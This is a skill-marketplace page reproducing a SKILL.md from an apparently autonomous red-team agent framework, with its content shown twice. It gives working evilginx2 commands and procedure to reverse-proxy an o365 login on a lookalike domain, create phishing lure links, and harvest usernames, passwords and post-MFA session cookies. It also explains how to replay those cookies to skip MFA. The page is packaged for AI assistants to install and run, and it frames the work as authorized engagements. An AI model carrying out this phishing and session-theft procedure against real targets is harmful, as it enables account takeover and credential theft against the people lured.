Run any Skill in Manus with one click

evilginx2-proxy

Stars4,445

Forks878

UpdatedJune 8, 2026 at 07:58

Author and deploy an evilginx2 phishlet to reverse-proxy a real login and capture the post-authentication session cookie, defeating MFA via session-token theft.

Installation

Install with Codex or Claude Copy this prompt, paste it into Codex, Claude, or another assistant, and let it review the skill page and install it for you.

Run Skill in Manus

Source

PurpleAILAB

PurpleAILAB/Decepticon

View GitHub Repository View Creator Repositories

Download

Run Skill in Manus

Related occupationsSOC

Based on SOC occupation classification

Information Security AnalystsComputer and Mathematical Occupations·SOC 15-1212

SKILL.md

readonly

name	evilginx2-proxy
description	Author and deploy an evilginx2 phishlet to reverse-proxy a real login and capture the post-authentication session cookie, defeating MFA via session-token theft.
metadata	{"subdomain":"phishing","when_to_use":"evilginx2, mfa bypass, session cookie capture, reverse proxy phishing, phishlet, adversary in the middle, aitm","mitre_attack":["T1566.002","T1557","T1539","T1111"],"tags":["phishing","evilginx","mfa-bypass","aitm"]}

evilginx2 Phishlet (AiTM)

When the target enforces MFA, a static fake login page is useless — you need the authenticated session cookie. evilginx2 is an adversary-in-the-middle reverse proxy: the victim authenticates against the real site through your proxy, MFA included, and you capture the resulting session token for replay.

Prerequisites

evilginx2 in the sandbox; ports 443/53 free.
A lookalike domain with an A record to the sandbox and NS delegation so evilginx2 can answer ACME (lookalike-domain).
The lure-deconfliction handshake COMPLETE.

Deploy

# DNS + cert: evilginx manages Let's Encrypt automatically
evilginx2 -p /opt/evilginx/phishlets
# in the evilginx console:
config domain login.acme-portal.example
config ipv4 <sandbox-ip>
phishlets hostname o365 login.acme-portal.example
phishlets enable o365
lures create o365
lures get-url 0          # -> the link you put in the GoPhish email

Authoring a phishlet (when none ships for the target)

A phishlet is a YAML map of the target's auth hosts, the sub_filters that rewrite the real domain to yours in responses, and the auth_tokens (which cookies signal a completed login). Capture a normal login in a proxy, identify the session cookie(s) the app sets post-MFA, and list them under auth_tokens. Keep ACME challenge paths off the proxied auth path.

Capture + replay

# evilginx console: list captured sessions
sessions
sessions <id>            # shows username, password, and the tokens (cookie JSON)

Import the captured cookie JSON into a clean browser profile / a Cookie header to ride the authenticated session without re-triggering MFA.

Evidence

Captured session → Credential node (type session-token) linked to the User node with the lure id. Save the session JSON under evidence/phisher/<id>-session.json. Note the estimated token TTL.

OPSEC

One phishlet per engagement domain; rotate after the engagement.
The session token is the crown jewel — store ONLY in evidence/ + the knowledge graph, never anywhere off-box.
evilginx_disable_phishlet (phishlets disable o365) returns 502 on a SOC stop request.

More from this repository

same repository

decepticon

PurpleAILAB/Decepticon

Drive Decepticon — an autonomous multi-agent red-team framework — over MCP to run authorized penetration tests and bug-bounty engagements end to end, then watch and steer them live from chat. Launch an engagement against a target, poll its transcript to narrate progress, send messages to refocus it, and pull findings as SARIF. Use when the user asks to run a pentest/red-team engagement, hunt a bug bounty, do recon, exploit/scan a host, web app, API, network, cloud, Active Directory, mobile app, or smart contract WITH Decepticon — or to check/resume a running engagement or report what Decepticon found. Triggers: run a decepticon engagement, pentest this with decepticon, bug bounty, recon this target, red team this, scan this host, resume the engagement, what did decepticon find, decepticon status. Do NOT use for ad-hoc local tool runs (running nmap/sqlmap/ffuf directly) when no Decepticon server is involved — this drives the Decepticon orchestrator, not raw tools.

2026-06-164.4k

iot-security

PurpleAILAB/Decepticon

IoT device security reconnaissance — firmware extraction, embedded analysis, protocol identification, default credential checking, vulnerability scanning, device fingerprinting.

2026-06-154.4k

mobile-security

PurpleAILAB/Decepticon

Mobile application security reconnaissance — APK/IPA analysis, permission enumeration, certificate validation, hardcoded secret detection, insecure storage identification, network security analysis.

2026-06-154.4k

wireless-security

PurpleAILAB/Decepticon

Wireless network security reconnaissance — WiFi analysis, Bluetooth assessment, RFID/NFC evaluation, signal capture, protocol analysis, encryption testing, rogue device detection.

2026-06-154.4k

finding-protocol

PurpleAILAB/Decepticon

Operational-tier finding template — minimal fields for sub-agent decision support. Heavyweight deliverable promotion lives in skills/decepticon/final-report.

2026-06-124.4k

engagement-lifecycle

PurpleAILAB/Decepticon

Red team engagement lifecycle management — initiation, phase transitions, go/no-go gates, deconfliction, emergency procedures, completion.

2026-06-124.4k

evilginx2 Phishlet (AiTM)

Prerequisites

evilginx2 in the sandbox; ports 443/53 free.

A lookalike domain with an A record to the sandbox and NS delegation so evilginx2 can answer ACME (lookalike-domain).

The lure-deconfliction handshake COMPLETE.

Deploy

# DNS + cert: evilginx manages Let's Encrypt automatically evilginx2 -p /opt/evilginx/phishlets # in the evilginx console: config domain login.acme-portal.example config ipv4 <sandbox-ip> phishlets hostname o365 login.acme-portal.example phishlets enable o365 lures create o365 lures get-url 0 # -> the link you put in the GoPhish email

Authoring a phishlet (when none ships for the target)

Capture + replay

# evilginx console: list captured sessions sessions sessions <id> # shows username, password, and the tokens (cookie JSON)

Import the captured cookie JSON into a clean browser profile / a Cookie header to ride the authenticated session without re-triggering MFA.

Evidence

OPSEC

One phishlet per engagement domain; rotate after the engagement.

The session token is the crown jewel — store ONLY in evidence/ + the knowledge graph, never anywhere off-box.

evilginx_disable_phishlet (phishlets disable o365) returns 502 on a SOC stop request.